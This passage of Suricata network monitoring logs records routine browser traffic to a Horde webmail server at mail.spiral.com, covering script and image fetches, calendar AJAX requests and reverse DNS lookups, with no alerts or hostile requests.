{"timestamp":"2020-02-29T00:19:47.938574+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569},"app_proto":"http","fileinfo":{"filename":"\/turba\/js\/minisearch.js","state":"CLOSED","stored":false,"size":1408,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.939491+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105}} {"timestamp":"2020-02-29T00:19:47.938699+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538},"app_proto":"http","fileinfo":{"filename":"\/js\/growler.js","state":"CLOSED","stored":false,"size":8911,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.939371+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/sound.js","state":"CLOSED","stored":false,"size":2456,"tx_id":5}} {"timestamp":"2020-02-29T00:19:47.940311+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tabset.png","state":"CLOSED","stored":false,"size":105,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.941636+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116}} {"timestamp":"2020-02-29T00:19:47.942466+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new-bg.png","state":"CLOSED","stored":false,"size":116,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.942679+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logo.png","state":"CLOSED","stored":false,"size":2337,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.944777+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/head-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.944907+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117},"app_proto":"http","fileinfo":{"filename":"\/js\/hordecore.js","state":"CLOSED","stored":false,"size":25017,"tx_id":5}} 
{"timestamp":"2020-02-29T00:19:47.985315+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436}} {"timestamp":"2020-02-29T00:19:47.985584+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674}} {"timestamp":"2020-02-29T00:19:47.985593+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558}} 
{"timestamp":"2020-02-29T00:19:47.985546+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221}} {"timestamp":"2020-02-29T00:19:47.985564+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423}} {"timestamp":"2020-02-29T00:19:47.985684+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546}} 
{"timestamp":"2020-02-29T00:19:48.131634+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings.png","state":"CLOSED","stored":false,"size":423,"tx_id":2}} {"timestamp":"2020-02-29T00:19:48.131778+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logout.png","state":"CLOSED","stored":false,"size":674,"tx_id":3}} {"timestamp":"2020-02-29T00:19:48.132056+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493}} {"timestamp":"2020-02-29T00:19:48.132118+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:19:49.677172+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7421},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36246,"tx_id":0}} {"timestamp":"2020-02-29T00:19:49.688948+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48417,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1346,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:49.800136+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48417,"proto":"UDP","dns":{"type":"answer","id":1346,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:49.800136+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48417,"proto":"UDP","dns":{"type":"answer","id":1346,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:49.965665+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339}} {"timestamp":"2020-02-29T00:19:50.000242+0000","flow_id":7712368340100,"event_type":"flow","src_ip":"192.168.10.122","src_port":44069,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:49.044164+0000","end":"2020-02-29T00:14:49.152103+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:19:50.000430+0000","flow_id":1980751639961820,"event_type":"flow","src_ip":"192.168.10.81","src_port":52774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1153,"bytes_toclient":9241,"start":"2020-02-29T00:18:43.876764+0000","end":"2020-02-29T00:18:49.567494+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:50.000900+0000","flow_id":2108866204128541,"event_type":"flow","src_ip":"192.168.10.122","src_port":51339,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:49.316701+0000","end":"2020-02-29T00:14:49.421564+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:50.230923+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:19:50.252004+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31396,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:50.360299+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54554,"proto":"UDP","dns":{"type":"answer","id":31396,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.360299+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54554,"proto":"UDP","dns":{"type":"answer","id":31396,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.428452+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} {"timestamp":"2020-02-29T00:19:50.428452+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} 
{"timestamp":"2020-02-29T00:19:50.482275+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":2}} {"timestamp":"2020-02-29T00:19:50.490777+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39263,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52820,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:50.601928+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39263,"proto":"UDP","dns":{"type":"answer","id":52820,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.601928+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39263,"proto":"UDP","dns":{"type":"answer","id":52820,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.628321+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59343,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17689,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:50.736476+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59343,"proto":"UDP","dns":{"type":"answer","id":17689,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.736476+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59343,"proto":"UDP","dns":{"type":"answer","id":17689,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.762114+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:19:50.762114+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} 
{"timestamp":"2020-02-29T00:19:50.766850+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:19:50.766850+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:19:51.059913+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/message.png","state":"CLOSED","stored":false,"size":493,"tx_id":3}} {"timestamp":"2020-02-29T00:19:51.060200+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262}} {"timestamp":"2020-02-29T00:19:51.201868+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-active.png","state":"CLOSED","stored":false,"size":262,"tx_id":4}} {"timestamp":"2020-02-29T00:19:51.202349+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207}} {"timestamp":"2020-02-29T00:19:51.389548+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-subnavi.png","state":"CLOSED","stored":false,"size":207,"tx_id":5}} {"timestamp":"2020-02-29T00:19:51.389808+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 